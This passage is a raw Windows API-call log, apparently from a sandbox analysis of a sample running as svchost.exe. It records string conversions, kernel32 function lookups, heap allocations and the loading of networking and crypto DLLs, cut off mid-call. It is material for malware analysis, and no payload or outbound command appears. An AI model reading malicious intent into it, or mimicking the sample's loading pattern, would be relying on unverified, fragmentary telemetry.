¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xcf080, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0186.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0xcf6c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿxù\x0c", lpUsedDefaultChar=0x0) returned 256 [0186.310] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0186.310] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0xcf290, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0186.310] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0186.310] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0xcf080, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0186.310] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0xcf7c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0186.310] RtlInitializeSListHead (in: ListHead=0x18007b1e0 | out: ListHead=0x18007b1e0) [0186.310] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0186.310] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlsAlloc") returned 0x7ffb26256cd0 [0186.310] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlsFree") returned 0x7ffb26257660 [0186.310] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlsGetValue") returned 0x7ffb2624d6e0 [0186.310] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlsSetValue") returned 0x7ffb26253ae0 [0186.310] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffb2625d760 [0186.310] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitOnceExecuteOnce") returned 0x7ffb25203d20 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateEventExW") returned 0x7ffb2625d6c0 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateSemaphoreW") returned 0x7ffb2625d730 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateSemaphoreExW") returned 0x7ffb2625d720 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateThreadpoolTimer") returned 0x7ffb26254d00 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetThreadpoolTimer") returned 0x7ffb28b0ae40 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7ffb28b0a650 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseThreadpoolTimer") returned 0x7ffb28b0a3f0 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateThreadpoolWait") returned 0x7ffb26258c50 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetThreadpoolWait") returned 0x7ffb28b09120 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseThreadpoolWait") returned 0x7ffb28b077e0 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FlushProcessWriteBuffers") returned 0x7ffb28ba68b0 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7ffb28b7fea0 [0186.311] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcessorNumber") returned 0x7ffb28ba4930 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateSymbolicLinkW") returned 0x7ffb26275b60 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentPackageId") returned 0x7ffb25208d40 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount64") returned 0x7ffb2624d6f0 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileInformationByHandleEx") returned 0x7ffb2625a030 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetFileInformationByHandle") returned 0x7ffb2625dc50 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x7ffb2625dd20 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeConditionVariable") returned 0x7ffb28b721f0 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WakeConditionVariable") returned 0x7ffb28b680f0 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WakeAllConditionVariable") returned 0x7ffb28b5bd20 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SleepConditionVariableCS") returned 0x7ffb251cbb10 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeSRWLock") returned 0x7ffb28b721f0 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="AcquireSRWLockExclusive") returned 0x7ffb28b2d760 [0186.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TryAcquireSRWLockExclusive") returned 0x7ffb28b04df0 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ReleaseSRWLockExclusive") returned 0x7ffb28b23790 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SleepConditionVariableSRW") returned 0x7ffb25216d30 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateThreadpoolWork") returned 0x7ffb262572c0 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SubmitThreadpoolWork") returned 0x7ffb28b2e420 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseThreadpoolWork") returned 0x7ffb28b0a7b0 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CompareStringEx") returned 0x7ffb2624dd30 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetLocaleInfoEx") returned 0x7ffb26254e60 [0186.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LCMapStringEx") returned 0x7ffb2624d560 [0186.345] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1000) returned 0x60cbd0 [0186.345] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18007bb60, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0186.345] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x30) returned 0x605660 [0186.345] GetEnvironmentStringsW () returned 0x60dbe0* [0186.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4e6) returned 0x60e5c0 [0186.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x60e5c0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0186.346] FreeEnvironmentStringsW (penv=0x60dbe0) returned 1 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x118) returned 0x609f20 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1f) returned 0x6151c0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2e) returned 0x6056a0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x31) returned 0x6057b0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c) returned 0x605800 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x31) returned 0x60a180 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x14) returned 0x6151a0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x24) returned 0x613050 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xd) returned 0x605850 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1d) returned 0x6153e0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x31) returned 0x60a1d0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x15) returned 0x615080 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x17) returned 0x6150a0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xe) returned 0x6056e0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x69) returned 0x60dbe0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3e) returned 0x616090 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1d) returned 0x6151e0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x48) returned 0x6148c0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x12) returned 0x6150c0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x18) returned 0x6152e0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1b) returned 0x6150e0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1e) returned 0x615100 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x29) returned 0x613260 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1e) returned 0x615220 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x6b) returned 0x60dc60 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x17) returned 0x6152a0 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xf) returned 0x605700 [0186.346] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x16) returned 0x615120 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2a) returned 0x613320 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x29) returned 0x6132f0 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x12) returned 0x615160 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x21) returned 0x613140 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x16) returned 0x615300 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x22) returned 0x613530 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x12) returned 0x6152c0 [0186.347] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60e5c0 | out: hHeap=0x560000) returned 1 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x100) returned 0x60dce0 [0186.347] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x7ffb26230000 [0186.347] GetProcessHeap () returned 0x560000 [0186.347] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x6170e0 [0186.347] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x7ffb28b00000 [0186.347] GetProcessHeap () returned 0x560000 [0186.347] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170e0 | out: hHeap=0x560000) returned 1 [0186.348] lstrlenA (lpString="Advapi32.dll") returned 12 [0186.348] GetProcessHeap () returned 0x560000 [0186.348] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617220 [0186.348] lstrcpyA (in: lpString1=0x617220, lpString2="Advapi32.dll" | out: lpString1="Advapi32.dll") returned="Advapi32.dll" [0186.348] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffb28a50000 [0186.355] GetProcessHeap () returned 0x560000 [0186.355] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617220 | out: hHeap=0x560000) returned 1 [0186.355] GetProcessHeap () returned 0x560000 [0186.355] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x618260 [0186.355] LoadLibraryA (lpLibFileName="WtsApi32.dll") returned 0x7ffb23860000 [0186.357] GetProcessHeap () returned 0x560000 [0186.357] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x618260 | out: hHeap=0x560000) returned 1 [0186.357] lstrlenA (lpString="User32.dll") returned 10 [0186.357] GetProcessHeap () returned 0x560000 [0186.357] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617270 [0186.357] lstrcpyA (in: lpString1=0x617270, lpString2="User32.dll" | out: lpString1="User32.dll") returned="User32.dll" [0186.357] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffb26090000 [0186.357] GetProcessHeap () returned 0x560000 [0186.357] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.357] GetProcessHeap () returned 0x560000 [0186.357] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.357] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffb267e0000 [0186.389] GetProcessHeap () returned 0x560000 [0186.389] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.389] lstrlenA (lpString="ShlwApi.dll") returned 11 [0186.389] GetProcessHeap () returned 0x560000 [0186.389] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0186.389] lstrcpyA (in: lpString1=0x617160, lpString2="ShlwApi.dll" | out: lpString1="ShlwApi.dll") returned="ShlwApi.dll" [0186.389] LoadLibraryA (lpLibFileName="ShlwApi.dll") returned 0x7ffb262e0000 [0186.390] GetProcessHeap () returned 0x560000 [0186.390] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.390] GetProcessHeap () returned 0x560000 [0186.390] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617260 [0186.390] LoadLibraryA (lpLibFileName="WinInet.dll") returned 0x7ffb19d70000 [0186.393] GetProcessHeap () returned 0x560000 [0186.393] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617260 | out: hHeap=0x560000) returned 1 [0186.393] GetProcessHeap () returned 0x560000 [0186.393] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171c0 [0186.393] LoadLibraryA (lpLibFileName="SetupApi.dll") returned 0x7ffb284c0000 [0186.396] GetProcessHeap () returned 0x560000 [0186.396] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.396] GetProcessHeap () returned 0x560000 [0186.396] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6170e0 [0186.396] LoadLibraryA (lpLibFileName="ImageHlp.dll") returned 0x7ffb26760000 [0186.400] GetProcessHeap () returned 0x560000 [0186.400] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6170e0 | out: hHeap=0x560000) returned 1 [0186.400] GetProcessHeap () returned 0x560000 [0186.400] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.400] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffb253c0000 [0186.405] GetProcessHeap () returned 0x560000 [0186.405] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.405] GetProcessHeap () returned 0x560000 [0186.405] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617200 [0186.405] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffb24fb0000 [0186.408] GetProcessHeap () returned 0x560000 [0186.408] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617200 | out: hHeap=0x560000) returned 1 [0186.408] lstrlenA (lpString="Userenv.dll") returned 11 [0186.408] GetProcessHeap () returned 0x560000 [0186.408] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.409] lstrcpyA (in: lpString1=0x617180, lpString2="Userenv.dll" | out: lpString1="Userenv.dll") returned="Userenv.dll" [0186.409] LoadLibraryA (lpLibFileName="Userenv.dll") returned 0x7ffb24880000 [0186.411] GetProcessHeap () returned 0x560000 [0186.411] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.411] GetProcessHeap () returned 0x560000 [0186.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171c0 [0186.411] LoadLibraryA (lpLibFileName="Oleaut32.dll") returned 0x7ffb288f0000 [0186.423] GetProcessHeap () returned 0x560000 [0186.423] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.423] GetProcessHeap () returned 0x560000 [0186.423] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617240 [0186.423] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffb253a0000 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617240 | out: hHeap=0x560000) returned 1 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa6) returned 0x60e1f0 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6170f0 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617100 [0186.425] lstrlenA (lpString=", ") returned 2 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x617250 [0186.425] lstrcpyA (in: lpString1=0x617250, lpString2=", " | out: lpString1=", ") returned=", " [0186.425] GetProcessHeap () returned 0x560000 [0186.425] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6170b0 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6171d0 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6171e0 [0186.425] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.425] GetProcessHeap () returned 0x560000 [0186.425] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.425] GetProcessHeap () returned 0x560000 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617200 [0186.426] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617200 | out: hHeap=0x560000) returned 1 [0186.426] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6171d0, Size=0x5) returned 